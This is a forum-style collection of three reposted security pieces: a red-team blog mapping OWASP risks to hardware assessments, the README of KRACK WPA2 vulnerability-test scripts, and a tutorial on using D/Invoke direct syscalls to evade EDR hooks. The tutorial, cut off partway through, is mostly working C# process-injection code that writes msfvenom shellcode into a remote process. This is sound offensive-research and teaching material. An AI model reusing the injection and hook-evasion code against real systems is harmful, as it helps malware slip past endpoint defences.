Nytro

A Red Team Guide for a Hardware Penetration Test Part 2: Using security risks from the Modern Open Web Application Security Project to help hack hardware Adam Toscher 1 day ago·4 min read This blog serves as a guide to helping demystify some of the bugs and issues discovered during hardware assessments. I’ve shared some of the lessons learned from years of applied logic, and reason to find problems that do not exist. This blog maps loosely some OWASP web application risks to hardware vulnerabilities, from a red team perspective. Some may find the guide below more useful, for IOT based controls, and not generalized hardware assessments. OWASP Internet of Things Project Oxford defines the Internet of Things as: "A proposed development of the Internet in which everyday objects have… wiki.owasp.org I cover some other general ways to assess IOT devices , in my previous article: A Red Team Guide for a Hardware Penetration Test: Part 1 When looking at different routing and networking technology it’s easy to be overwhelmed, with how to assess an embedded… medium.com 1. Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently. By using the hash of another user, one could use that stored hash as a substitute for an admin’s password. After retrieving the admin hash, the user has “root” access to the device. The vendor‘s response to the customers - addressing the stored hash vulnerability Broken Access Control Summary: OWASP Top 10 Web Application Security Control: Broken Access Control Red Team Technique: Leveraged: The Red team technique used was Pass the hash. The P-T-H technique is covered in my article below. Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) Yes it’s still easy to get Domain Admin “before lunch” as it was when I first started. medium.com Any user could use the stored hash of an admin user — similar to the Windows attack. This thought pattern came from my days of a penetration testing Windows, since passing the hash is a common technique used, but not usually during the assessment of networking gear. 2. Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. By changing parameters passed to a cli program, you can often use diagnostic utilities; ifconfig, ping, or tcpdump to interact outside your jailed or sandboxed environment. Injection Summary: OWASP Top 10 Web Application Security Control: Injection Red Team Technique: Leveraged: The Red team technique used was the same as any other assessor — lateral thinking. By fuzzing parameters it was possible to abuse diagnostic utilities, like ifconfig and tcpdump and “inject” commands to interact with the underlying operating system. 3. Forced Browsing is an attack where the aim is to enumerate and access resources that are not referenced by the application, but are still accessible. An attacker can use Brute Force techniques to search for unlinked contents in the domain directory, such as temporary directories and files, and old backup and configuration files. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders. This attack is performed manually when the application index directories and pages are based on number generation or predictable values, or using automated tools for common files and directory names. This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration. Forced Browsing’s Impact can range from informational to severe depending on it’s use Forced Browsing Summary: OWASP Top 10 Web Application Security Control: Injection Red Team Technique: Leveraged: The Red team technique used was the same as any other assessor; attempt to leverage a known weakness, to access sensitive information. Security Misconfigurations This is the most commonly seen issue, across all devices and assets alike. This is commonly a result of insecure, or default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion. From the most basic misconfiguration to the most elaborate, they’re out there — bugs and major vulnerabilities residing on “secure” hardware platforms Many “security” devices don’t follow best security practices. TL;DR Sometimes you may not need to decap a chip; all you need is a keyboard, a monitor, and direct access to the underlying hardware. Sursa: https://adam-toscher.medium.com/a-red-team-guide-for-a-hardware-penetration-test-9debc5e9e211

This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper. Remember that our scripts are not attack scripts! You will need the appropriate network credentials in order to test if an access point or client is affected by the KRACK attack. 21 January 2021: the scripts have been made compatible with Python3 and has been updated to better support newer Linux distributions. If you want to revert to the old version, execute git fetch --tags && git checkout v1 after cloning the repository (and switch back to the latest version using git checkout research). Prerequisites Our scripts were tested on Kali Linux. To install the required dependencies on Kali, execute: sudo apt update sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils virtualenv Then disable hardware encryption: cd krackattack sudo ./disable-hwcrypto.sh Note that if needed you can later re-enable hardware encryption using the script sudo ./reenable-hwcrypto.sh. It's recommended to reboot after disabling hardware encryption. We tested our scripts with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N v1 on Kali Linux. Now compile our modified hostapd instance: cd krackattack ./build.sh Finally, to assure you're using compatible python libraries, create a virtualenv with the dependencies listed in krackattack/requirements.txt: cd krackattack ./pysetup.sh Before every usage Every time before you use the scripts you must disable Wi-Fi in your network manager. Then execute: sudo rfkill unblock wifi cd krackattack sudo su source venv/bin/activate After doing this you can executing the scripts multiple times as long as you don't close the terminal. Testing Clients First modify hostapd/hostapd.conf and edit the line interface= to specify the Wi-Fi interface that will be used to execute the tests. Note that for all tests, once the script is running, you must let the device being tested connect to the SSID testnetwork using the password abcdefgh. You can change settings of the AP by modifying hostapd/hostapd.conf. In all tests the client must use DHCP to get an IP after connecting to the Wi-Fi network. This is because some tests only start after the client has requested an IP using DHCP! You should now run the following tests located in the krackattacks/ directory: ./krack-test-client.py --replay-broadcast. This tests whether the client acceps replayed broadcast frames. If the client accepts replayed broadcast frames, this must be patched first. If you do not patch the client, our script will not be able to determine if the group key is being reinstalled (because then the script will always say the group key is being reinstalled). ./krack-test-client.py --group --gtkinit. This tests whether the client installs the group key in the group key handshake with the given receive sequence counter (RSC). See section 6.4 of our [follow-up research paper(https://papers.mathyvanhoef.com/ccs2018.pdf)] for the details behind this vulnerability. ./krack-test-client.py --group. This tests whether the client reinstalls the group key in the group key handshake. In other words, it tests if the client is vulnerable to CVE-2017-13080. The script tests for reinstallations of the group key by sending broadcast ARP requests to the client using an already used (replayed) packet number (here packet number = nonce = IV). Note that if the client always accepts replayed broadcast frames (see --replay-broadcast), this test might incorrectly conclude the group key is being reinstalled. ./krack-test-client.py. This tests for key reinstallations in the 4-way handshake by repeatedly sending encrypted message 3's to the client. In other words, this tests for CVE-2017-13077 (the vulnerability with the highest impact) and for CVE-2017-13078 . The script monitors traffic sent by the client to see if the pairwise key is being reinstalled. Note that this effectively performs two tests: whether the pairwise key is reinstalled, and whether the group key is reinstalled. Make sure the client requests an IP using DHCP for the group key reinstallation test to start. To assure the client is sending enough unicast frames, you can optionally ping the AP: ping 192.168.100.254. ./krack-test-client.py --tptk. Identical to test 4, except that a forged message 1 is injected before sending the encrypted message 3. This variant of the test is important because some clients (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise key reinstallations in the 4-way handshake when a forged message 1 is injected before sending a retransmitted message 3. ./krack-test-client.py --tptk-rand. Same as the above test, except that the forged message 1 contains a random ANonce. ./krack-test-client.py --gtkinit. This tests whether the client installs the group key in the 4-way handshake with the given receive sequence counter (RSC). The script will continously execute new 4-way handshakes to test this. Unfortunately, this test can be rather unreliable, because any missed handshake messages cause synchronization issues, making the test unreliable. You should only execute this test in environments with little background noise, and execute it several times. Some additional remarks: The most important test is ./krack-test-client, which tests for ordinary key reinstallations in the 4-way handshake. Perform these tests in a room with little interference. A high amount of packet loss will make this script less reliable! Optionally you can manually inspect network traffic to confirm the output of the script (some Wi-Fi NICs may interfere with our scripts): Use an extra Wi-Fi NIC in monitor mode to conform that our script (the AP) sends out frames using the proper packet numbers (IVs). In particular, check whether replayed broadcast frames indeed are sent using an already used packet number (IV). Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls by monitoring the IVs of frames sent by the client. Capture traffic on the client to see if the replayed broadcast ARP requests are accepted or not. If the client can use multiple Wi-Fi radios/NICs, perform the test using several Wi-Fi NICs. You can add the --debug parameter for more debugging output. All unrecognized parameters are passed on to hostapd, so you can include something like -dd -K to make hostapd output all debug info. Correspondence to Wi-Fi Alliance tests The Wi-Fi Alliance created a custom vulnerability detection tool based on our scripts. At the time of writing, this tool is only accessible to Wi-Fi Alliance members. Their tools supports several different tests, and these tests correspond to the functionality in our script as follows: 4.1.1 (Plaintext retransmission of EAPOL Message 3). We currently do not support this test. This test is not necessary anyway. Make sure the device being tested passes test 4.1.3, and then it will also pass this test. 4.1.2 (Immediate retransmission of EAPOL M3 in plaintext). We currently do not suppor this test. Again, make sure the device being tested passes test 4.1.3, and then it will also pass this test. 4.1.3 (Immediate retransmission of encrypted EAPOL M3 during pairwise rekey handshake). This corresponds to ./krack-test-client.py, except that encrypted EAPOL M3 are sent periodically instead of immediately. 4.1.5 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, same ANonce). Execute this test using ./krack-test-client.py --tptk. 4.1.6 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, random ANonce). Execute this test using ./krack-test-client.py --tptk-rand. 4.2.1 (Group key handshake vulnerability test on STA). Execue this test using ./krack-test-client.py --group. 4.3.1 (Reinstallation of GTK and IGTK on STA supporting WNM sleep mode). We currently do not support this test (and neither does the Wi-Fi Alliance actually!). Testing Access Points: Detecting a vulnerable FT Handshake (802.11r) Create a wpa_supplicant configuration file that can be used to connect to the network. A basic example is: ctrl_interface=/var/run/wpa_supplicant network={ ssid="testnet" key_mgmt=FT-PSK psk="password" } Note the use of "FT-PSK". Save it as network.conf or similar. For more info see wpa_supplicant.conf. Try to connect to the network using your platform's wpa_supplicant. This will likely require a command such as: sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf If this fails, either the AP does not support FT, or you provided the wrong network configuration options in step 1. Note that if the AP does not support FT, it is not affected by this vulnerability. Use this script as a wrapper over the previous wpa_supplicant command: sudo ./krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c network.conf This will execute the wpa_supplicant command using the provided parameters, and will add a virtual monitor interface that will perform attack tests. Use wpa_cli to roam to a different AP of the same network. For example: sudo wpa_cli -i wlan0 > status bssid=c4:e9:84:db:fb:7b ssid=testnet ... > scan_results bssid / frequency / signal level / flags / ssid c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet ... > roam c4:e9:84:1d:a5:bc ... In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see status command). The scan_results command shows this network also has a second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP. Generate traffic between the AP and client. For example: sudo arping -I wlan0 192.168.1.10 Now look at the output of ./krack-ft-test.py to see if the AP is vulnerable. First it should say "Detected FT reassociation frame". Then it will start replaying this frame to try the attack. The script shows which IVs (= packet numbers) the AP is using when sending data frames. Message IV reuse detected (IV=X, seq=Y). AP is vulnerable! means we confirmed it's vulnerable. Be sure to manually check network traces as well, to confirm this script is replaying the reassociation request properly, and to manually confirm whether there is IV (= packet number) reuse or not. Example output of vulnerable AP: [15:59:24] Replaying Reassociation Request [15:59:25] AP transmitted data using IV=1 (seq=0) [15:59:25] Replaying Reassociation Request [15:59:26] AP transmitted data using IV=1 (seq=0) [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable! Example output of patched AP (note that IVs are never reused): [16:00:49] Replaying Reassociation Request [16:00:49] AP transmitted data using IV=1 (seq=0) [16:00:50] AP transmitted data using IV=2 (seq=1) [16:00:50] Replaying Reassociation Request [16:00:51] AP transmitted data using IV=3 (seq=2) [16:00:51] Replaying Reassociation Request [16:00:52] AP transmitted data using IV=4 (seq=3) Extra: Hardware Decryption To confirm that hardware decryption is disable, execute systool -vm ath9k_htc or similar after plugging in your Wi-Fi NIC to confirm the nohwcript/swcrypto/hwcrypto parameter has been set. Note that you must replace ath9k_htc with the kernel module for your wireless network card. Extra: 5 GHz not supported There's no official support for testing devices in the 5 GHz band. If you nevertheless want to use the tool on 5 GHz channels, the network card being used must allow the injection of frames in the 5 GHz channel. Unfortunately, this is not always possible due to regulatory constraints. To see on which channels you can inject frames you can execute iw list and look under Frequencies for channels that are not marked as disabled, no IR, or radar detection. Note that these conditions may depend on your network card, the current configured country, and the AP you are connected to. For more information see, for example, the Arch Linux documentation. Note that the Linux kernel may not allow the injection of frames even though it is allowed to send normal frames. This is because in the function ieee80211_monitor_start_xmit the kernel refuses to inject frames when cfg80211_reg_can_beacon returns false. As a result, Linux may refuse to inject frames even though this is actually allowed. Making cfg80211_reg_can_beacon return true under the correct (or all) conditions prevents this bug. So you'll have to patch the Linux drivers so that cfg80211_reg_can_beacon always returns true, for instance, by manually patching the packport driver code. Extra: Manual Tests It's also possible to manually perform (more detailed) tests by cloning the hostap git repository: git clone git://w1.fi/srv/git/hostap.git And following the instructions in tests/cipher-and-key-mgmt-testing.txt. Sursa: https://github.com/vanhoefm/krackattacks-scripts

Syscalls with D/Invoke Rasta Mouse Jan 24, 2021 11 min read c#.netdinvokesyscallsedr Windows Architecture Primer x86 processors have 4 privilege levels, known as rings, that control access to memory and CPU operations. They range from Ring 0, the most privileged, to Ring 3. Image credit: Wikipedia Windows only supports Rings 0 and 3, affectionately known as Kernel and User Mode respectively. The majority of user activity will occur in Ring 3 but applications may cross into Ring 0 when calling a variety of APIs - this is required when accessing the filesystem for example. There is also a hierarchy to the native APIs. User applications will generally call “high-level” APIs in kernel32 and user32 etc, and those APIs will call “low-level” APIs in ntdll. Image credit: TechNet If you’re familiar with basic process injection, you will know that APIs such as OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread are often used - all of which live inside kernel32. OpenProcess itself calls NtOpenProcess which can be observed in a tool such as API Monitor. Security vendors realised that if they were going to detect and/or block this type of activity, then they would need to hook these APIs. There are different types of hooks that we won’t look into detail here - but think of a hook as a type of man-in-the-middle. Instead of pointing to the real function, an API call is redirected to a vendor-controlled module where it can be inspected and/or dropped. Image credit: Practical Malware Analysis At first, vendors were only hooking APIs within kernel32, such as OpenProcess. Attackers could circumvent this by calling NtOpenProcess directly (illustrated above) which would effectively bypass the vendors hook. Vendors obviously started to push back by also hooking the corresponding Nt* functions as well. So where do we go next? Syscalls A system call (syscall) is the means by which ntdll transitions to the kernel. We can “unassemble” NtOpenProcess in WinDBG easily enough to see the instructions. 0:000> u ntdll!NtOpenProcess ntdll!NtOpenProcess: 00007ffd`8570c460 4c8bd1 mov r10,rcx 00007ffd`8570c463 b826000000 mov eax,26h 00007ffd`8570c468 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 00007ffd`8570c470 7503 jne ntdll!NtOpenProcess+0x15 (00007ffd`8570c475) 00007ffd`8570c472 0f05 syscall 00007ffd`8570c474 c3 ret 00007ffd`8570c475 cd2e int 2Eh 00007ffd`8570c477 c3 ret There are also excellent syscall lookup tables that we can use as well. D/Invoke has an excellent method called GetSyscallStub that will read ntdll from disk and find the syscall for a given API. To demonstrate - this is the API trace of the typical OpenProcess/VirtualAllocEx/WriteProcessMemory/CreateRemoteThread (I’ve blurred ones that are not directly related to the injection to preserve the clarity of the calls we want to focus on). This was tested with the following code: using System; using System.Runtime.InteropServices; namespace ConsoleApp1 { class Program { // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp static readonly byte[] _shellcode = new byte[323] { 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d, 0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, 0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48, 0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13, 0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f, 0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73, 0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 }; static void Main(string[] args) { var hProcess = OpenProcess( 0x001F0FFF, false, int.Parse(args[0])); var hRegion = VirtualAllocEx( hProcess, IntPtr.Zero, (uint)_shellcode.Length, 0x1000 | 0x2000, 0x04); // PAGE_READWRITE WriteProcessMemory( hProcess, hRegion, _shellcode, (uint)_shellcode.Length, out UIntPtr _); VirtualProtectEx( hProcess, hRegion, (UIntPtr)_shellcode.Length, 0x20, // PAGE_EXECUTE_READ out uint _); CreateRemoteThread( hProcess, IntPtr.Zero, 0, hRegion, IntPtr.Zero, 0, IntPtr.Zero); } [DllImport("kernel32.dll")] static extern IntPtr OpenProcess( int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx( IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread( IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); } } We shall now replace the standard P/Invoke with syscalls for each of these APIs. GetSyscallStub The first step is to replace the P/Invoke signatures with corresponding delegates targeting the Nt functions. For instance, OpenProcess will be replaced with: [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtOpenProcess( ref IntPtr ProcessHandle, uint DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId); [StructLayout(LayoutKind.Sequential, Pack = 0)] struct OBJECT_ATTRIBUTES { public int Length; public IntPtr RootDirectory; public IntPtr ObjectName; public uint Attributes; public IntPtr SecurityDescriptor; public IntPtr SecurityQualityOfService; } [StructLayout(LayoutKind.Sequential)] struct CLIENT_ID { public IntPtr UniqueProcess; public IntPtr UniqueThread; } (NTSTATUS is a pretty big enum that I’ve excluded for brevity). Next, get a pointer to the syscall: IntPtr stub = Generic.GetSyscallStub("NtOpenProcess"); GetSyscallStub only takes a FunctionName and not a target DLL, since syscalls only exist in ntdll. Marshal that pointer to the delegate: NtOpenProcess ntOpenProcess = (NtOpenProcess) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtOpenProcess)); And then call the method: IntPtr hProcess = IntPtr.Zero; OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES(); CLIENT_ID ci = new CLIENT_ID { UniqueProcess = (IntPtr)uint.Parse(args[0]) }; NTSTATUS result = ntOpenProcess( ref hProcess, 0x001F0FFF, ref oa, ref ci); The return code should be Success and hProcess now contains a value. result Success hProcess 0x00000000000003bc Final Code using DInvoke.DynamicInvoke; using System; using System.Runtime.InteropServices; namespace ConsoleApp1 { class Program { // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp static readonly byte[] _shellcode = new byte[323] { 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d, 0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, 0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48, 0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13, 0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f, 0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73, 0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 }; static void Main(string[] args) { // NtOpenProcess IntPtr stub = Generic.GetSyscallStub("NtOpenProcess"); NtOpenProcess ntOpenProcess = (NtOpenProcess) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtOpenProcess)); IntPtr hProcess = IntPtr.Zero; OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES(); CLIENT_ID ci = new CLIENT_ID { UniqueProcess = (IntPtr)uint.Parse(args[0]) }; NTSTATUS result = ntOpenProcess( ref hProcess, 0x001F0FFF, ref oa, ref ci); // NtAllocateVirtualMemory stub = Generic.GetSyscallStub("NtAllocateVirtualMemory"); NtAllocateVirtualMemory ntAllocateVirtualMemory = (NtAllocateVirtualMemory) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtAllocateVirtualMemory)); IntPtr baseAddress = IntPtr.Zero; IntPtr regionSize = (IntPtr)_shellcode.Length; result = ntAllocateVirtualMemory( hProcess, ref baseAddress, IntPtr.Zero, ref regionSize, 0x1000 | 0x2000, 0x04); // NtWriteVirtualMemory stub = Generic.GetSyscallStub("NtWriteVirtualMemory"); NtWriteVirtualMemory ntWriteVirtualMemory = (NtWriteVirtualMemory) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtWriteVirtualMemory)); var buffer = Marshal.AllocHGlobal(_shellcode.Length); Marshal.Copy(_shellcode, 0, buffer, _shellcode.Length); uint bytesWritten = 0; result = ntWriteVirtualMemory( hProcess, baseAddress, buffer, (uint)_shellcode.Length, ref bytesWritten); // NtProtectVirtualMemory stub = Generic.GetSyscallStub("NtProtectVirtualMemory"); NtProtectVirtualMemory ntProtectVirtualMemory = (NtProtectVirtualMemory) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtProtectVirtualMemory)); uint oldProtect = 0; result = ntProtectVirtualMemory( hProcess, ref baseAddress, ref regionSize, 0x20, ref oldProtect); // NtCreateThreadEx stub = Generic.GetSyscallStub("NtCreateThreadEx"); NtCreateThreadEx ntCreateThreadEx = (NtCreateThreadEx) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtCreateThreadEx)); IntPtr hThread = IntPtr.Zero; result = ntCreateThreadEx( out hThread, ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, hProcess, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero); } [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtOpenProcess( ref IntPtr ProcessHandle, uint DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtAllocateVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, uint AllocationType, uint Protect); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtWriteVirtualMemory( IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, uint BufferLength, ref uint BytesWritten); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtProtectVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint NewProtect, ref uint OldProtect); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtCreateThreadEx( out IntPtr threadHandle, ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList); [StructLayout(LayoutKind.Sequential, Pack = 0)] struct OBJECT_ATTRIBUTES { public int Length; public IntPtr RootDirectory; public IntPtr ObjectName; public uint Attributes; public IntPtr SecurityDescriptor; public IntPtr SecurityQualityOfService; } [StructLayout(LayoutKind.Sequential)] struct CLIENT_ID { public IntPtr UniqueProcess; public IntPtr UniqueThread; } [Flags] enum ACCESS_MASK : uint { DELETE = 0x00010000, READ_CONTROL = 0x00020000, WRITE_DAC = 0x00040000, WRITE_OWNER = 0x00080000, SYNCHRONIZE = 0x00100000, STANDARD_RIGHTS_REQUIRED = 0x000F0000, STANDARD_RIGHTS_READ = 0x00020000, STANDARD_RIGHTS_WRITE = 0x00020000, STANDARD_RIGHTS_EXECUTE = 0x00020000, STANDARD_RIGHTS_ALL = 0x001F0000, SPECIFIC_RIGHTS_ALL = 0x0000FFF, ACCESS_SYSTEM_SECURITY = 0x01000000, MAXIMUM_ALLOWED = 0x02000000, GENERIC_READ = 0x80000000, GENERIC_WRITE = 0x40000000, GENERIC_EXECUTE = 0x20000000, GENERIC_ALL = 0x10000000, DESKTOP_READOBJECTS = 0x00000001, DESKTOP_CREATEWINDOW = 0x00000002, DESKTOP_CREATEMENU = 0x00000004, DESKTOP_HOOKCONTROL = 0x00000008, DESKTOP_JOURNALRECORD = 0x00000010, DESKTOP_JOURNALPLAYBACK = 0x00000020, DESKTOP_ENUMERATE = 0x00000040, DESKTOP_WRITEOBJECTS = 0x00000080, DESKTOP_SWITCHDESKTOP = 0x00000100, WINSTA_ENUMDESKTOPS = 0x00000001, WINSTA_READATTRIBUTES = 0x00000002, WINSTA_ACCESSCLIPBOARD = 0x00000004, WINSTA_CREATEDESKTOP = 0x00000008, WINSTA_WRITEATTRIBUTES = 0x00000010, WINSTA_ACCESSGLOBALATOMS = 0x00000020, WINSTA_EXITWINDOWS = 0x00000040, WINSTA_ENUMERATE = 0x00000100, WINSTA_READSCREEN = 0x00000200, WINSTA_ALL_ACCESS = 0x0000037F, SECTION_ALL_ACCESS = 0x10000000, SECTION_QUERY = 0x0001, SECTION_MAP_WRITE = 0x0002, SECTION_MAP_READ = 0x0004, SECTION_MAP_EXECUTE = 0x0008, SECTION_EXTEND_SIZE = 0x0010 }; [Flags] enum NTSTATUS : uint { // Success Success = 0x00000000, Wait0 = 0x00000000, Wait1 = 0x00000001, Wait2 = 0x00000002, Wait3 = 0x00000003, Wait63 = 0x0000003f, Abandoned = 0x00000080, AbandonedWait0 = 